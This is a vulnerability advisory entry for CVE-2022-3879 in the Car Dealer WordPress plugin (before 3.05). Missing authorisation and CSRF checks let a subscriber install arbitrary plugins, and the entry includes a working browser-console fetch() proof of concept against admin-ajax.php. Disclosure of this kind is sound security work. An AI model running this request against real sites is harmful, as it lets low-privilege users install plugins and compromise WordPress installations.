Lucene search
Lana CodesWPEX-ID:0DB1762E-1401-4006-88ED-D09A4BC6585BHistoryNov 21, 2022 - 12:00 a.m.
Car Dealer < 3.05 - Subscriber+ Arbitrary Plugin Installation
2022-11-2100:00:00
Lana Codes
149
car dealer
plugin installation
web browser
subscriber user
exploit
developer console
classic-editor plugin
EPSS
0.001
Percentile
21.4%
The plugin does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org
Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=cardealer_install_plugin&slug=classic-editor',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
prion
prion
Cross site request forgery (csrf)
2022-12-12 18:15:00
patchstack
patchstack
nvd
nvd
CVE-2022-3879
2022-12-12 18:15:11
cve
cve
CVE-2022-3879
2022-12-12 18:15:11
wpvulndb
wpvulndb
Car Dealer < 3.05 - Subscriber+ Arbitrary Plugin Installation
2022-11-21 00:00:00
cvelist
cvelist
CVE-2022-3879 Car Dealer < 3.05 - Subscriber+ Arbitrary Plugin Installation
2022-12-12 17:54:52